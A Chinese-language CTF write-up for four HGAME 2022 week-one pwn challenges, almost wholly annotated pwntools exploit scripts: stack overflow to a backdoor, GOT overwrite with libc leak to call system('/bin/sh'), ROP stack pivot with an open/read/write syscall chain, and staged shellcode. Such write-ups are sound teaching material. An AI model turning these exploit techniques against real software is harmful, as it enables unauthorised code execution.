2022-hgame-week1

本文最后更新于:2023年2月6日 晚上

hgame week1-pwn wp

test_nc

直接nc即可。

easy_overflow

#!/usr/bin/python
#encoding:utf-8

# Solve script for "easy_overflow": a stack buffer overflow that replaces the
# saved return address with the address of a backdoor function in the binary.
from pwn import *

context.arch = 'amd64'
context.log_level = 'debug'  # echo every byte sent/received

fn = './vuln'
elf = ELF(fn)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')  # loaded but not used below

# NOTE: `debug` actually selects the REMOTE target (1) versus a local
# process (0); the name is inverted relative to its meaning.
debug = 0
if debug:
    p = remote('week-1.hgame.lwsec.cn', 30487)

else:
    p = process(fn)


# Fixed address of the backdoor function in the challenge binary
# (presumably built without PIE — confirm with checksec).
backdoor = 0x40117E

# 0x18 bytes of filler reach the saved return address, which is then
# replaced by `backdoor`; p64 packs it as 8 little-endian bytes (amd64).
payload = b'a' * 0x18 + p64(backdoor)
p.sendline(payload)

# Redirect the spawned shell's stdout to stderr; presumably the challenge
# closes or redirects stdout so command output would otherwise not be seen.
p.sendline('exec 1>&2')

p.interactive()

choose_the_seat

覆盖exit_got为main,泄漏puts地址,最后覆盖puts_got为system。

#!/usr/bin/python
#encoding:utf-8

# Solve script for "choose_the_seat". Per the write-up above, the "seat"
# index is not bounds-checked, so a negative index lets the "name" write
# land on the binary's GOT. Plan: 1) overwrite exit@got with main so the
# program restarts instead of exiting, 2) leak the resolved address of puts
# from the GOT to compute the libc base, 3) overwrite puts@got with system
# so the program's own puts(name) call (presumably) runs system("/bin/sh").
# Full RELRO (read-only GOT) would defeat this; the binary presumably lacks it.
from pwn import *

context.arch = 'amd64'
context.log_level = 'debug'  # echo every byte sent/received

fn = './vuln'
elf = ELF(fn)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')  # must match the remote libc build

# NOTE: `debug` actually selects the REMOTE target (1) versus a local
# process (0); the name is inverted relative to its meaning.
debug = 0
if debug:
    p = remote('week-1.hgame.lwsec.cn', 31094)

else:
    p = process(fn)


main = 0x4012d1      # fixed address => non-PIE binary, presumably
exit_plt = 0x4010e0  # defined but not used below

# Step 1: index -6 presumably selects exit's GOT slot (the index-to-slot
# mapping is not visible here; verify against the disassembly).
p.recvuntil('please choose one.')
p.sendline('-6')

# The 16-byte "name" overwrites that slot with main and zeroes the next one.
p.recvuntil('input your name')
payload = p64(main) + p64(0)
p.send(payload)

# Step 2: index -9 is presumably the slot just before puts@got. Writing 8
# bytes with no NUL terminator makes the program's puts(name) keep printing
# into the adjacent slot, i.e. it leaks the resolved address of puts.
p.recvuntil('please choose one.')
p.sendline('-9')

p.recvuntil('input your name')
p.send(b'a' * 8)

# The leaked pointer is little-endian with 0x7f as its highest non-zero
# byte; keep the last 6 bytes and NUL-pad to 8 for u64().
puts = u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
log.success('puts: ' + hex(puts))

libc_base = puts - libc.sym['puts']
log.success('libc_base: ' + hex(libc_base))

system = libc_base + libc.sym['system']

# Step 3: same slot again; "/bin/sh\0" goes into the slot and system's
# address into the following one (puts@got), so puts(name) becomes
# system("/bin/sh").
p.recvuntil('please choose one.')
p.sendline('-9')

p.recvuntil('input your name')
p.send(b'/bin/sh\x00' + p64(system))

p.interactive()

orw

控制rbp或者rax即可实现对rsi的控制,进而read任一地址。

image-20230111114144304

#!/usr/bin/python
#encoding:utf-8

# Solve script for "orw": a two-stage stack overflow. Stage 1 is a ret2plt
# leak (puts(puts@got), then return to main) to compute the libc base.
# Stage 2 pivots the stack into a writable data area of the binary and runs
# an open/read/write syscall chain there. The challenge name suggests a
# seccomp-style filter that forbids execve, so the flag file is read and
# printed directly instead of spawning a shell (confirm against the binary).
from pwn import *

context.arch = 'amd64'
context.log_level = 'debug'  # echo every byte sent/received

fn = './vuln'
elf = ELF(fn)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')  # must match the remote libc build

# NOTE: `debug` actually selects the REMOTE target (1) versus a local
# process (0); the name is inverted relative to its meaning.
debug = 0
if debug:
    p = remote('week-1.hgame.lwsec.cn', 32124)

else:
    p = process(fn)


puts_plt = elf.plt['puts']  # PLT stub: call puts without knowing libc
puts_got = elf.got['puts']  # GOT slot: holds puts's resolved libc address

# Fixed binary addresses (non-PIE, presumably; confirm with checksec).
# `read` is the binary's own read call site; per the write-up, rsi is
# derived from rbp/rax there, which is what makes the read target
# controllable.
read = 0x4012d6
main = 0x4012f0

pop_rdi_ret = 0x401393
leave_ret = 0x4012be
data = 0x404100  # writable area inside the binary, used as the fake stack

p.recvuntil('before you try to solve this task.')

# Stage 1: 0x108 bytes of filler reach the return address; puts(puts_got)
# leaks the real address of puts, and returning to main gives a second
# overflow.
payload = b'a' * 0x108 + p64(pop_rdi_ret) + p64(puts_got) + p64(puts_plt) + p64(main)
p.send(payload)

# The leak is a little-endian 64-bit pointer whose highest non-zero byte is
# 0x7f; keep the last 6 bytes and NUL-pad to 8 for u64().
puts = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
log.success('puts: ' + hex(puts))

libc_base = puts - libc.sym['puts']
log.success('libc_base: ' + hex(libc_base))

# Gadget offsets relative to the libc base. They are specific to the exact
# libc build loaded above and must be re-derived for any other version.
pop_rax_ret = libc_base + 0x36174
pop_rsi_ret = libc_base + 0x2601f
pop_rdx_ret = libc_base + 0x142c92
syscall_ret = libc_base + 0x630a9

# gdb.attach(p)
# pause()

# Stage 2: filler stops 8 bytes short so p64(data) becomes the saved rbp.
# Then: pop rax = data; return into the binary's read so the next input
# lands at `data`; `leave; ret` (presumably reached on return from that
# read) moves rsp to `data` and continues from the chain sent below.
# The trailing 0 qword is presumably padding.
p.recvuntil('before you try to solve this task.')
payload = b'a' * 0x100 + p64(data) + p64(pop_rax_ret) + p64(data) + p64(read) + p64(leave_ret) + p64(0)
p.send(payload)

# Syscall chain executed from `data`: syscall number in rax, arguments in
# rdi/rsi/rdx. `leave` pops the first 8 bytes at `data` ("flag\0\0\0\0")
# into rbp, so the gadgets start at data + 8.
rop_data = [
pop_rax_ret, # sys_open('flag', 0): rdi -> the "flag" string at data
2,
pop_rdi_ret,
data,
pop_rsi_ret,
0,
syscall_ret,

pop_rax_ret, # sys_read(flag_fd, heap, 0x100): assumes the new fd is 3
0,
pop_rdi_ret,
3,
pop_rsi_ret,
data + 0x100,
pop_rdx_ret,
0x100,
syscall_ret,

pop_rax_ret, # sys_write(1, heap, 0x100): no pop_rdx here, relies on rdx still being 0x100
1,
pop_rdi_ret,
1,
pop_rsi_ret,
data + 0x100,
syscall_ret
]

# "flag" plus NUL padding fills the first 8 bytes at `data` (consumed by
# `leave` as rbp); flat() packs the gadget list as 8-byte words after it.
payload = b'flag\x00\x00\x00\x00' + flat(rop_data)
p.sendline(payload)

p.interactive()

simple_shellcode

#!/usr/bin/python
#encoding:utf-8

# Solve script for "simple_shellcode": two-stage shellcode. Stage 1 is a
# tiny loader that reads a larger second stage into a fixed address and
# jumps to it; stage 2 prints the flag file.
from pwn import *

context.arch = 'amd64'
context.log_level = 'debug'  # echo every byte sent/received

fn = './vuln'
elf = ELF(fn)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')  # loaded but not used below

# NOTE: `debug` actually selects the REMOTE target (1) versus a local
# process (0); the name is inverted relative to its meaning.
debug = 0
if debug:
    p = remote('week-1.hgame.lwsec.cn', 32737)

else:
    p = process(fn)

p.recvuntil('your shellcode:')

# Stage 1 loader: sets up read(0, 0xCAFE0100, rdx) — rdi = 0 (stdin),
# rsi = 0xCAFE0100 (presumably the address the challenge maps for
# shellcode). Neither the syscall number (rax = 0) nor the byte count (rdx)
# is set here; both are assumed to be left over from the program's own
# read — verify in gdb. `push rsi` leaves the buffer address on the stack so
# the final `ret` transfers control to the freshly read stage 2. The
# `xor rsi, rsi` is redundant: a 32-bit `mov esi` already zero-extends rsi.
p1 = '''
nop
xor rdi, rdi
xor rsi, rsi
mov esi, 0xCAFE0100
push rsi
syscall
ret
'''
print(len(asm(p1)))  # stage-1 size, presumably bounded by the challenge's input limit
p.send(asm(p1))

# Stage 2: pwntools' ready-made "cat flag" shellcode (open/read/write).
p2 = asm(shellcraft.cat('flag'))
p.sendline(p2)

p.interactive()
